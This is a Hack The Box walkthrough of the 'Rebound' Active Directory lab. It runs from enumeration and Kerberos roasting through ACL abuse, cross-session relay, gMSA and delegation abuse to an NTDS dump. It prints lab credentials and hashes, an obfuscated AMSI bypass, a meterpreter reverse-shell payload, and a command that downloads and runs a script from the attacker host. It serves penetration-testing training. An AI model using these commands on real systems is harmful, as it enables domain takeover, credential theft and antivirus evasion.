HTB - Rebound

Description

Rebound is an Insane Windows machine featuring a tricky Active Directory environment. User enumeration via RID cycling reveals an AS-REP-roastable user, whose TGT is used to Kerberoast another user with a crackable password. Weak ACLs are abused to obtain access to a group with FullControl over an OU, performing a Descendant Object Takeover (DOT), followed by a ShadowCredentials attack on a user with winrm access. On the target system, cross-session relay is leveraged to obtain the NetNTLMv2 hash of a logged-in user, which, once cracked, leads to a gMSA password read. Finally, the gMSA account allows delegation, but without protocol transition. Resource-Based Constrained Delegation (RBCD) is used to impersonate the Domain Controller, enabling a DCSync attack, leading to fully elevated privileges.

Enumeration

IP Address: 10.10.11.231

Nmap Scan

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/all-port-scan

PORT    STATE SERVICE
53/tcp  open  domain
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
5985/tcp open   wsman

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nmap -p53,88,135,139,389,445,5985 -sCV $ip -Pn -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-31 20:41:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap    Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-31T20:43:17+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after:  2024-08-24T22:48:10
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m01s
445/tcp  open  microsoft-ds?
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb2-time: 
|   date: 2024-10-31T20:41:42
|_  start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Summary

* Open ports: 53,88,135,139,445,5985
* UDP open ports: 53,88,123,389
* Services: DNS - RPC - SMB - KERBEROS - LDAP - NTP - winRM
* Important notes: DNS:dc01.rebound.htb - Domain: rebound.htb

Before I start, I'd prefer to update /etc/hosts file to prevent further issues and to easily communicate with the box without typing the IP each time.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $sudo sh -c "echo  '$ip dc01 dc01.rebound.htb rebound.htb' >> /etc/hosts"

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $tail -n1 /etc/hosts
10.10.11.231 dc01 dc01.rebound.htb rebound.htb

Service Enumeration

DNS Enumeration

It's always good to try Zone transfer, but it hardly-ever succeeds

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $dig axfr @10.10.11.231 dc01.rebound.htb

; <<>> DiG 9.18.19-1~deb12u1-Debian <<>> axfr @10.10.11.231 dc01.rebound.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

RPC & SMB Enumeration

I didn't get anything interesting from RPC, SMB would be the next

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomusers
result was NT_STATUS_ACCESS_DENIED

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $rpcclient -U '%' $ip -c enumdomgroups
result was NT_STATUS_ACCESS_DENIED

I can see, I have Read access on Shared share but unfortunately it's empty

─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --shares

SMB     10.10.11.231    445    DC01   [+] rebound.htb\: 
SMB     10.10.11.231    445    DC01   [-] Error enumerating shares: STATUS_ACCESS_DENIED

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --shares

SMB         10.10.11.231    445    DC01             [+] rebound.htb\guest: 
SMB         10.10.11.231    445    DC01             [*] Enumerated shares
SMB         10.10.11.231    445    DC01   Share    Permissions     Remark
SMB         10.10.11.231    445    DC01   -----    -----------     ------
SMB         10.10.11.231    445    DC01  ADMIN$                    Remote Admin
SMB         10.10.11.231    445    DC01  C$                        Default share
SMB         10.10.11.231    445    DC01  IPC$          READ        Remote IPC
SMB         10.10.11.231    445    DC01  NETLOGON                  Logon server share
SMB         10.10.11.231    445    DC01  Shared        READ      
SMB         10.10.11.231    445    DC01  SYSVOL                    Logon server share

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $impacket-smbclient rebound.htb/'guest':''@dc01
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use Shared
# ls
drw-rw-rw-          0  Fri Aug 25 17:46:36 2023 .
drw-rw-rw-          0  Fri Aug 25 17:46:36 2023 ..

When attempting RID brute with an anonymous login, It failed but succeeded with guest account.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u '' -p '' --rid-brute 10000

SMB         10.10.11.231    445    DC01             [+] rebound.htb\: 
SMB         10.10.11.231    445    DC01             [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u 'guest' -p '' --rid-brute 10000

SMB         10.10.11.231    445    DC01             [+] rebound.htb\guest: 
SMB         10.10.11.231    445    DC01             498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             500: rebound\Administrator (SidTypeUser)
SMB         10.10.11.231    445    DC01             501: rebound\Guest (SidTypeUser)
SMB         10.10.11.231    445    DC01             502: rebound\krbtgt (SidTypeUser)
SMB         10.10.11.231    445    DC01             512: rebound\Domain Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             513: rebound\Domain Users (SidTypeGroup)
SMB         10.10.11.231    445    DC01             514: rebound\Domain Guests (SidTypeGroup)
SMB         10.10.11.231    445    DC01             515: rebound\Domain Computers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             516: rebound\Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             517: rebound\Cert Publishers (SidTypeAlias)
SMB         10.10.11.231    445    DC01             518: rebound\Schema Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             519: rebound\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             520: rebound\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.231    445    DC01             521: rebound\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             522: rebound\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.231    445    DC01             525: rebound\Protected Users (SidTypeGroup)
SMB         10.10.11.231    445    DC01             526: rebound\Key Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             527: rebound\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.231    445    DC01             553: rebound\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.231    445    DC01             571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.231    445    DC01             572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.231    445    DC01             1000: rebound\DC01$ (SidTypeUser)
SMB         10.10.11.231    445    DC01             1101: rebound\DnsAdmins (SidTypeAlias)
SMB         10.10.11.231    445    DC01             1102: rebound\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.231    445    DC01             1951: rebound\ppaul (SidTypeUser)
SMB         10.10.11.231    445    DC01             2952: rebound\llune (SidTypeUser)
SMB         10.10.11.231    445    DC01             3382: rebound\fflock (SidTypeUser)
SMB         10.10.11.231    445    DC01             5277: rebound\jjones (SidTypeUser)
SMB         10.10.11.231    445    DC01             5569: rebound\mmalone (SidTypeUser)
SMB         10.10.11.231    445    DC01             5680: rebound\nnoon (SidTypeUser)
SMB         10.10.11.231    445    DC01             7681: rebound\ldap_monitor (SidTypeUser)
SMB         10.10.11.231    445    DC01             7682: rebound\oorend (SidTypeUser)
SMB         10.10.11.231    445    DC01             7683: rebound\ServiceMgmt (SidTypeGroup)
SMB         10.10.11.231    445    DC01             7684: rebound\winrm_svc (SidTypeUser)
SMB         10.10.11.231    445    DC01             7685: rebound\batch_runner (SidTypeUser)
SMB         10.10.11.231    445    DC01             7686: rebound\tbrady (SidTypeUser)
SMB         10.10.11.231    445    DC01             7687: rebound\delegator$ (SidTypeUser)

I added the users I found to a wordlist to use it later

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $cat wordlists/users.list 

ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
ServiceMgmt
winrm_svc
batch_runner
tbrady
delegator$

LDAP & Kerberos Enumeration

I tried to query ldap anonymously but got nothing from it.

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $ldapsearch -H ldap://10.10.11.231 -x -s sub '*' -b "DC=rebound,DC=htb"

# LDAPv3
# base <DC=rebound,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: * 
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090ACD, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

The last option now is Kerberos. With my usernames list, I can try two possible attacks, one common and one new to many people.

ASREP-Roasting Attack
Kerberosting via asreproastable account

nxc ldap dc01 -u wordlists/users.list -p '' --asreproast asrep.hashes

Unluckily, cracking the hash failed which made me move to the next possible attack

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt

..snip..
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:812fbf1df8bffa65dd...2a6157

To perform this attack, we need the latest version of Impacket

mkdir impacket && cd impacket
python3 -m venv . && source ./bin/activate
pip3 install impacket

This is the option we need

Foothold

I will try to get some hashes and if succeed, I will output them to a file.

python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebount.htb

python3 impacket/bin/GetUserSPNs.py rebound.htb/ -usersfile wordlists/users.list -request -no-preauth jjones -dc-ip dc01.rebount.htb -output kerberos.hashes

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 13100 kerberos.hashes /usr/share/wordlists/rockyou.txt

..snip..
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$8ebcdf0e97d1de0fd18f1bd980841c97$e9d2eb41eead735aaf2a6ccd8eb3882380a2aaec21fa7a6ecea8380ebef4fd18b505a84caaf3976620b5fbd032007a6f23252bad48766d656bc03d3e2606ef901838357db952de0ac676d9890ac1b045e1a78ee3545ac0f4012fca682ce2779becd3ea481d559afb34cbe4c3807daf7f2d3e72febba1cd66756043f1dc63322a0b860f53a254b97e22efc02adcf20e861761b054023b3d7037dd6ff85e71bb6569b289c8dfc3aa29064b24e2668b346eaaa6830690e9d2f39db1ca4dc958f56221d0d3868915a258556b45647b3e77a0afbd552c6a66a7611d9132217e8d8500808d08ea0243c1754d55c6ee817d49ce4f7621e0603cc65a2c653137fd79808a2998a4a0a2d9c74629429b6334ac6a896e8e8192c642a2df9519a6cdf61db8ea3b7c70065d3548736274a89a9ca5552a3fdf06d69ce6c45eb11a6a38e0c8ad920574f0adbbe535227037e6c94043d5147723fb7b941bb29ffa8214d95476b1193fd6a91e1cb39ffb4758f198e13992d31c4c676b82d51174234392f64979e66dd506738e29048b27bf6310f2e73c7bdb8ce35b57fc7cb3c1374eed517fc83fdc51ae6de05b287ae3e25f802c364fc7a5d7cfa05711f3c97ccf8f3a64c4dc292859a90947aef6b5d1211de7f116e3aae597683e94d04f3617ca71c62986a6841a9279574c81d4964ac5858ece2086fb7bf5a3cd1913d3d18067ba230e09b7e5a24d359dd78d55ef6379a6eb17899fef7d61b9a08d7f9ebcbcdb23ff03374bbb0847d5038f99a71ddb29a5c701e50c95eea1e2f60648f4da03a3a7bc3b4849043a81ac4581a1394d9adc027b896b737dc37b20cbf7455333d6893dc9609fabc60eca77ea365c9a11296032bb47fdcabb5ccc54d5badeaca04b83c7316a75acb18df6cb38b497c8fa633caf48625577966fabb6e3f4c57c4707264c5f440d42e09f5857b138a64277616900b87dd1f635418f801e8495a6c7f03c22c62810c079d234e6ab852bc668d8d341a5ea8f3ac80daefa223586b2aa617b51cab39dc99ed4ca0ba510a296c4702b64b2326d0e0063e94d21fe697c1170ddf51c7ad5ddfc68f459ec242f5a23f4c3a4db66b30a439162e5838a1599f3de591df34e16bfd2aaaa583cd8f82bbfbacd6ba48eeecef121156689a72e5cd4cee5c16f0e8863ba4278fc588317114736229443767f97a8c44a63f4f90c2c003ba5973deee28b8f17a2708ef0ff4be67699089487effe72b484ecabbe98ac8cdfde17bee572f6fdc12eb83cc43c1fd2e65c103d98e7b1f17b443523f2c4e35d565eb38671598b59026378875380e9f3c9fb9ac25360c96b64b9bb315f87455c973334ca40d2cb7219c6ba:1GR8t@$$4u

Session..........: hashcat
Status...........: Cracked

Let's check the validity of these credentials. Authentication to smb worked but LDAP failed

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc smb dc01 -u ldap_monitor -p '1GR8t@$$4u'

SMB    10.10.11.231    445    DC01   [+] rebound.htb\ldap_monitor:1GR8t@$$4u 

┌──[kali@parrot]─[~/HackTheBox/platform/machines/Rebound/ldapdomaindump]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u'

LDAPS       10.10.11.231    636    DC01   [-] rebound.htb\ldap_monitor:1GR8t@$$4u 
LDAPS       10.10.11.231    636    DC01   [-] LDAPS channel binding might be enabled, this is only supported with kerberos authentication. Try using '-k'.

It looks like it needs Kerberos authentication to be enforced, I will try again with -k

I faced kerberos clock skew problem and didn't work with common solutions, so I write this script to sync with kerberos each second. "Not the best way, but it worked :)" while True;do ntpdate 10.10.11.231;sleep 1;done

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u ldap_monitor -p '1GR8t@$$4u' -k

LDAPS   dc01     636    DC01    [+] rebound.htb\ldap_monitor

With valid domain credentials, I can move to the the domain enumeration process, credentialed enumeration against LDAP, smb, and try password spray. I will start with bloodhound.py

┌─[✗]─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $bloodhound-python -u 'ldap_monitor@rebound.htb' -p '1GR8t@$$4u' -ns 10.10.11.231 -d rebound.htb --zip -k

INFO: Found AD domain: rebound.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.rebound.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 16 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.rebound.htb
INFO: Done in 00M 42S
INFO: Compressing output into 20241031191948_bloodhound.zip

Lateral Movement

I found that two users shared the same passwords and the third was group not user.

Looking at permission on shares and files inside with spider_plus module but nothing interesting. I will enumerate the domain manually with PowerView.py

(powerview.py) ┌─[kali@parrot]─[/opt/powerview.py]
└──╼ $python3 powerview.py rebound.htb/ldap_monitor:'1GR8t@$$4u'@10.10.11.231 -k

(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainUser -Identity oorend -Properties name,ObjectSid                                        
name          : oorend
objectSid     : S-1-5-21-4078382237-1492182817-2568127209-7682

(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682

[2024-10-31 19:46:49] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID                   : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : Self
AccessMask                  : 0x8
InheritanceType             : None
SecurityIdentifier          : oorend (S-1-5-21-4078382237-1492182817-2568127209-7682)

User oorend has AddSelf to ServiceMgmt groups, So I'm curious to see the ACLs of this group I found that it had FullControl over Organisational unit (OU) Service Users

(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -Identity * -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7683
[2024-10-31 19:48:50] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN                    : OU=Service Users,DC=rebound,DC=htb
ObjectSID                   : None
ACEType                     : ACCESS_ALLOWED_ACE
ACEFlags                    : None
ActiveDirectoryRights       : FullControl
AccessMask                  : 0xf01ff
InheritanceType             : None
SecurityIdentifier          : ServiceMgmt (S-1-5-21-4078382237-1492182817-2568127209-7683)

(LDAPS)-[dc01.rebound.htb]-[rebound\ldap_monitor]
PV > Get-DomainObjectAcl -SearchBase "OU=Service Users,DC=rebound,DC=htb" -Select ObjectDN

..snip..
CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
..snip..

When enumerating the Domain object under this OU, I found that it contains winrm_svc account who is a member of Remote Management users, So he can access the machine via winRM

The Exploitation path is: Abuse AddSelf => Abuse FullControl Inhertiance => ChangePassword of winrm_svc or shadow Credentials

python3 powerview.py rebound.htb/oorend:'1GR8t@$$4u'@10.10.11.231 -k
Add-DomainGroupMember -Identity "ServiceMgmt" -Members oorend

Add-DomainObjectAcl -TargetIdentity "OU=Service Users,DC=rebound,DC=htb" -PrincipalIdentity oorend -Rights fullcontrol
or
./bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --dc-ip 10.10.11.231 -k --host dc01.rebound.htb add genericAll "OU=Service Users,DC=rebound,DC=htb" oorend

Set-DomainUserPassword -Identity winrm_svc -AccountPassword 'NewPass@w0rd123!!'
Or
net rpc password winrm_svc 'NewPass@w0rd123!!' -U rebound.htb/oorend%'1GR8t@$$4u' -S 10.10.11.231

Access the machine

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $evil-winrm -i dc01 -u winrm_svc -p 'NewPass@w0rd123!!'

*Evil-WinRM* PS C:\Users\winrm_svc\Documents>

User Flag: 46bad1cb1f3b5f3da2945c6f38c92c7c

Privilege Escalation

The password and ACLs are resettled, So I must harry and establish persistent shell

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=443 -f psh -o shell.ps1
sudo msfconsole -x 'use exploit/multi/handler;set lhost 10.10.16.3;set lport 443;set payload windows/x64/meterpreter/reverse_tcp; run'

[Ref].Assembly.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzAA==')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwA=')))).SetValue($null,$true)

iex(iwr -UseBasicParsing 10.10.16.3/shell.ps1)

After getting a shell in metasploit, I want to query logged-on users but it didn't give me anything, However when using logon type 9 (network logon), it shows that tbrady user is logged on.

Looking into Bloodhound for the privileges of that use, I found that it can read GMSA account hash

To get this account, I can use cross-sessionattack, steal its NTLMv2 hash, and try to crack it.

I used this repo to perform the attack: antonioCoco/RemotePotato0: Windows Privilege Escalation from User to Domain Admin.

Following this repo instruction, I get these two commands.

sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999 &
.\RemotePotato0.exe -m 2 -s 1 -x 10.10.16.3 -p 9999

Trying to crack the hash using hashcat and succeeded :))

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $hashcat -m 5600 hashes/ntlmv2.hash /usr/share/wordlists/rockyou.txt

TBRADY::rebound:0a5c6a4a69ec25ec:45e00b50ae6b1770ce5783b45df11a7b:010100000000000015d8a3db012cdb015057b803f05c13760000000002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e006800740062000700080015d8a3db012cdb0106000400060000000800300030000000000000000100000000200000be29ef78de83964dfabe9aac638f7dda5b4d0fcbeaa670fed3addf513a647f820a00100000000000000000000000000000000000090000000000000000000000:543BOMBOMBUNmanda

Session..........: hashcat
Status...........: Cracked

Now, I can read GMSA hash

┌─[kali@parrot]─[~/HackTheBox/platform/machines/Rebound]
└──╼ $nxc ldap dc01 -u TBRADY -p '543BOMBOMBUNmanda' --gmsa -k

LDAPS       dc01            636    DC01             [+] rebound.htb\TBRADY:543BOMBOMBUNmanda 
LDAPS       dc01            636    DC01             [*] Getting GMSA Passwords
LDAPS       dc01            636    DC01             Account: delegator$  NTLM: ed8d95b20400dce3355419f277d3421c

I want to enumerate the delegate of the account delegator$

(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $findDelegation.py rebound.htb/'delegator$'@dc01 -hashes :ed8d95b20400dce3355419f277d3421c -k                                                                                                                 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName  AccountType                          DelegationType  DelegationRightsTo     SPN Exists                                                                                                                
-----------  -----------------------------------  --------------  ---------------------  ----------                                                                                                                
delegator$   ms-DS-Group-Managed-Service-Account  Constrained     http/dc01.rebound.htb  No

From here, I stopped and couldn't go any further. the constrained delegation here is for http service and I couldn't request a ticket impersonating the administrator or the DC01, So the following attack path is very complicated and I will try to simplify it as I can.

Since I already have control of delegator$ account, I can perform RBCD and add ldap_monitor to ms-ds-allowtoactonbehalfofotheridentity list, so ldap_monitor can impersonate any user in the domain
Requesting Service Ticket as ldap_monitor impersonating the DC01, so the ticket will have forwardable flag
Using this ticket to request another ticket instead of s4u2self and impersonate the DC

rbcd.py 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -k -delegate-from ldap_monitor -delegate-to 'delegator$' -action write -dc-ip dc01.rebound.htb -use-ldaps

findDelegation.py 'rebound.htb/delegator$' -dc-ip 10.10.11.231 -k -hashes :ed8d95b20400dce3355419f277d3421c

getST.py 'rebound.htb/ldap_monitor:1GR8t@$$4u' -spn browser/dc01.rebound.htb -impersonate 'DC01$'

getST.py -spn http/dc01.rebound.htb -impersonate 'DC01$' 'rebound.htb/delegator$' -hashes :ed8d95b20400dce3355419f277d3421c -additional-ticket 'DC01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache'

Dumping ntds.dit secrets

(impacket) ┌─[✗]─[kali@parrot]─[/opt/impacket/bin]
└──╼ $nxc smb dc01 -k --use-kcache --ntds --user administrator
SMB         dc01            445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB         dc01            445    DC01             [+] rebound.htb\DC01$ from ccache 
SMB         dc01            445    DC01             [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         dc01            445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc01            445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::

Access the machine as an administrator

(impacket) ┌─[kali@parrot]─[/opt/impacket/bin]
└──╼ $evil-winrm -i dc01 -u administrator -H 176be138594933bb67db3b2572fc91b8

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
56bf9cc0fa746883f65axxxxxxxxxxxxx

Root Flag: 56bf9cc0fa746883f65ab822f3ceb779

PreviousHTB - Ghost NextHTB - Mist

Last updated 8 months ago